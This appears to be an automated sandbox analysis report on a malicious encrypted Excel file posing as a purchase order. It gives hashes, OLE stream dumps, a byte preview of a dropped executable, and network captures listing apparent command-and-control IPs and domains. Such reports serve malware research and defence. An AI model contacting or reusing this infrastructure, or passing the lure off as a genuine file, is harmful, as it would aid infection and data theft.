                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............0.................. ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......H................................................................0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*..s....}.....~....}.....(.......(.....*.0.............(........(......*.................0..4........r...p(.............s....}........{......(....}....*:..{....(....&*..0..................

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:CDFV2 Encrypted
                                                                                                                                                                      Entropy (8bit):7.960930778239428
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                      File name:EME_PO.47563.xlsx
                                                                                                                                                                      File size:201728
                                                                                                                                                                      MD5:3ef301afc6cc945e31ab9c8f4c24b29c
                                                                                                                                                                      SHA1:fc4f87402b120027927a5303eb3ced1e96f979a4
                                                                                                                                                                      SHA256:f6feb4b1cb9e6c6df4cab250ed38f0b25d6033ce97a7e68dbf90eb6c49fb1b13
                                                                                                                                                                      SHA512:8d0d4a29dd5ae9d60f160aa1d9406b59c7cac9c43146e9ebfc9c4e116ca328554087fe81e2f73f643ba3d5a6faeab71e2a24878c6af0efadd54e4be15ca64881
                                                                                                                                                                      SSDEEP:6144:3TWq7m2xCRdahQX1AxH171aJO/6kNHI4f/1xFxxm:3Rm2GahUAdRQJO/fHI4f/1lxm
                                                                                                                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                      Static OLE Info

                                                                                                                                                                      General

                                                                                                                                                                      Document Type:OLE
                                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                                      OLE File "EME_PO.47563.xlsx"

                                                                                                                                                                      Indicators

                                                                                                                                                                      Has Summary Info:False
                                                                                                                                                                      Application Name:unknown
                                                                                                                                                                      Encrypted Document:True
                                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                                      Contains Workbook/Book Stream:False
                                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                                      Flash Objects Count:
                                                                                                                                                                      Contains VBA Macros:False

                                                                                                                                                                      Streams

                                                                                                                                                                      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:64
                                                                                                                                                                      Entropy:2.73637206947
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                                      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:112
                                                                                                                                                                      Entropy:2.7597816111
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                                      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:200
                                                                                                                                                                      Entropy:3.13335930328
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                      Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                                      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:\x6DataSpaces/Version
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:76
                                                                                                                                                                      Entropy:2.79079600998
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                      Stream Path: EncryptedPackage, File Type: data, Stream Size: 194632
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:EncryptedPackage
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:194632
                                                                                                                                                                      Entropy:7.9980105307
                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                      Data ASCII:5 . . . . . . . y 5 . e k . . o . . . . . 9 . . . . . i . . . . . 7 C J + k ? Q . . . 6 . . M . 3 { S ( . [ 7 . . . . . _ z . 6 . . . s . H . . 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p
                                                                                                                                                                      Data Raw:35 f8 02 00 00 00 00 00 79 35 8c 65 6b 2e 9f 6f 0c ef c1 01 f7 39 d2 b7 02 92 a5 69 99 7f 13 19 c5 37 43 4a 2b 6b 3f 51 c3 a1 c6 36 0b 82 4d 1d 33 7b 53 28 d2 5b 37 b9 da b8 16 13 5f 7a 19 36 0e 1a 9d 73 93 48 ee ef 30 b8 a1 80 58 dc 27 70 bd c6 dc 2f 18 33 18 23 30 b8 a1 80 58 dc 27 70 bd c6 dc 2f 18 33 18 23 30 b8 a1 80 58 dc 27 70 bd c6 dc 2f 18 33 18 23 30 b8 a1 80 58 dc 27 70
                                                                                                                                                                      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:EncryptionInfo
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:224
                                                                                                                                                                      Entropy:4.5136937946
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . f ' ' c . . . j ^ y ( . 4 . . s . . R . . . . . . 8 S . . . . . . . . v . G m . . . M b 8 . . . . . > . . . S . . . U l . . . .
                                                                                                                                                                      Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                      11/26/20-21:17:16.761616ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                                                                                      11/26/20-21:17:17.772731ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                                                                                      11/26/20-21:17:19.785661ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                                                                                      11/26/20-21:17:21.088021TCP1201ATTACK-RESPONSES 403 Forbidden804916923.227.38.74192.168.2.22

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Nov 26, 2020 21:16:00.625966072 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.744024992 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.744132996 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.744925022 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.866168022 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.866190910 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.866204023 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.866215944 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.866286993 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.866332054 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.984383106 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.984409094 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.984560966 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.985613108 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.985630035 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.985641956 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.985656977 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.985671043 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.985686064 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.985702991 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.985724926 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:00.985730886 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.102469921 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.102499008 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.102510929 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.102523088 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.102731943 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.103353024 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.103369951 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.103380919 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.103396893 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.103429079 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.103452921 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.105675936 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.105691910 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.105705023 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.105719090 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.105730057 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.105742931 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.105755091 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.105758905 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.105783939 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.105788946 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.105849981 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.105873108 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.108016014 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.220751047 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.220778942 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.220789909 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.220802069 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.220813036 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.220824003 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.220834970 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.220845938 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.221050024 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.221066952 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.221077919 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.221091986 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.221103907 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.221115112 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.221116066 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.221127033 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.221138954 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.221163034 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.221178055 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.221223116 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223505020 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223525047 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223537922 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223550081 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223572016 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223587990 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223601103 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223613024 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223618031 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223633051 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223649025 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223649979 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223701954 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223750114 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223766088 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223779917 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223792076 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223803997 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223834991 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.223870039 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.224059105 CET4916580192.168.2.22192.227.129.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.339143991 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.339169979 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.339181900 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.339198112 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.339210033 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.339221001 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.339234114 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.339246035 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.339257956 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.339270115 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.339281082 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.339293003 CET8049165192.227.129.22192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:01.339303970 CET8049165192.227.129.22192.168.2.22

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Nov 26, 2020 21:16:48.137219906 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                      Nov 26, 2020 21:16:48.291912079 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:16:53.933782101 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                      Nov 26, 2020 21:16:54.280513048 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:17:00.183963060 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                      Nov 26, 2020 21:17:00.234890938 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:17:05.659591913 CET6120053192.168.2.228.8.8.8
                                                                                                                                                                      Nov 26, 2020 21:17:05.709474087 CET53612008.8.8.8192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:17:10.725769997 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                      Nov 26, 2020 21:17:11.731065035 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                      Nov 26, 2020 21:17:12.744934082 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                      Nov 26, 2020 21:17:14.757503033 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                      Nov 26, 2020 21:17:15.754189014 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:17:16.758619070 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:17:17.772422075 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:17:19.785506964 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:17:20.795813084 CET5562753192.168.2.228.8.8.8
                                                                                                                                                                      Nov 26, 2020 21:17:20.851593018 CET53556278.8.8.8192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:17:26.093291998 CET5600953192.168.2.228.8.8.8
                                                                                                                                                                      Nov 26, 2020 21:17:26.450227022 CET53560098.8.8.8192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:17:31.770586014 CET6186553192.168.2.228.8.8.8
                                                                                                                                                                      Nov 26, 2020 21:17:31.831497908 CET53618658.8.8.8192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:17:42.289381027 CET5517153192.168.2.228.8.8.8
                                                                                                                                                                      Nov 26, 2020 21:17:42.340491056 CET53551718.8.8.8192.168.2.22
                                                                                                                                                                      Nov 26, 2020 21:17:47.631573915 CET5249653192.168.2.228.8.8.8
                                                                                                                                                                      Nov 26, 2020 21:17:47.682826042 CET53524968.8.8.8192.168.2.22

                                                                                                                                                                      ICMP Packets

                                                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                      Nov 26, 2020 21:17:16.761615992 CET192.168.2.228.8.8.8d007(Port unreachable)Destination Unreachable
                                                                                                                                                                      Nov 26, 2020 21:17:17.772731066 CET192.168.2.228.8.8.8d007(Port unreachable)Destination Unreachable
                                                                                                                                                                      Nov 26, 2020 21:17:19.785660982 CET192.168.2.228.8.8.8d007(Port unreachable)Destination Unreachable

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                      Nov 26, 2020 21:16:48.137219906 CET192.168.2.228.8.8.80x708cStandard query (0)www.hostingbisniz.comA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:16:53.933782101 CET192.168.2.228.8.8.80xa14dStandard query (0)www.8no3.comA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:00.183963060 CET192.168.2.228.8.8.80xccffStandard query (0)www.cna-notary.comA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:05.659591913 CET192.168.2.228.8.8.80x2f03Standard query (0)www.vandelayind.netA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:10.725769997 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.macijanie.comA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:11.731065035 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.macijanie.comA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:12.744934082 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.macijanie.comA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:14.757503033 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.macijanie.comA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:20.795813084 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.tennessyherb.comA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:26.093291998 CET192.168.2.228.8.8.80xf09aStandard query (0)www.bestpodstudio.comA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:31.770586014 CET192.168.2.228.8.8.80x4b92Standard query (0)www.xjcg168.comA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:42.289381027 CET192.168.2.228.8.8.80x4b93Standard query (0)www.pellatrap.netA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:47.631573915 CET192.168.2.228.8.8.80x9e1cStandard query (0)www.thejakx.comA (IP address)IN (0x0001)

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                      Nov 26, 2020 21:16:48.291912079 CET8.8.8.8192.168.2.220x708cNo error (0)www.hostingbisniz.comhostingbisniz.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:16:48.291912079 CET8.8.8.8192.168.2.220x708cNo error (0)hostingbisniz.com209.126.13.151A (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:16:54.280513048 CET8.8.8.8192.168.2.220xa14dNo error (0)www.8no3.com156.235.143.6A (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:00.234890938 CET8.8.8.8192.168.2.220xccffNo error (0)www.cna-notary.comcna-notary.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:00.234890938 CET8.8.8.8192.168.2.220xccffNo error (0)cna-notary.com184.168.131.241A (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:05.709474087 CET8.8.8.8192.168.2.220x2f03Name error (3)www.vandelayind.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:15.754189014 CET8.8.8.8192.168.2.220x3c4eServer failure (2)www.macijanie.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:16.758619070 CET8.8.8.8192.168.2.220x3c4eServer failure (2)www.macijanie.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:17.772422075 CET8.8.8.8192.168.2.220x3c4eServer failure (2)www.macijanie.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:19.785506964 CET8.8.8.8192.168.2.220x3c4eServer failure (2)www.macijanie.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:20.851593018 CET8.8.8.8192.168.2.220x6ec7No error (0)www.tennessyherb.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:20.851593018 CET8.8.8.8192.168.2.220x6ec7No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:26.450227022 CET8.8.8.8192.168.2.220xf09aNo error (0)www.bestpodstudio.comsbsfe-p11r.geo.mf0.yahoodns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:26.450227022 CET8.8.8.8192.168.2.220xf09aNo error (0)sbsfe-p11r.geo.mf0.yahoodns.net67.195.197.25A (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:31.831497908 CET8.8.8.8192.168.2.220x4b92No error (0)www.xjcg168.comxjcg168.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:31.831497908 CET8.8.8.8192.168.2.220x4b92No error (0)xjcg168.com102.141.201.70A (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:42.340491056 CET8.8.8.8192.168.2.220x4b93No error (0)www.pellatrap.net74.208.236.61A (IP address)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:42.340491056 CET8.8.8.8192.168.2.220x4b93No error (0)www.pellatrap.net192.168.1.12A (IP address)IN (0x0001)
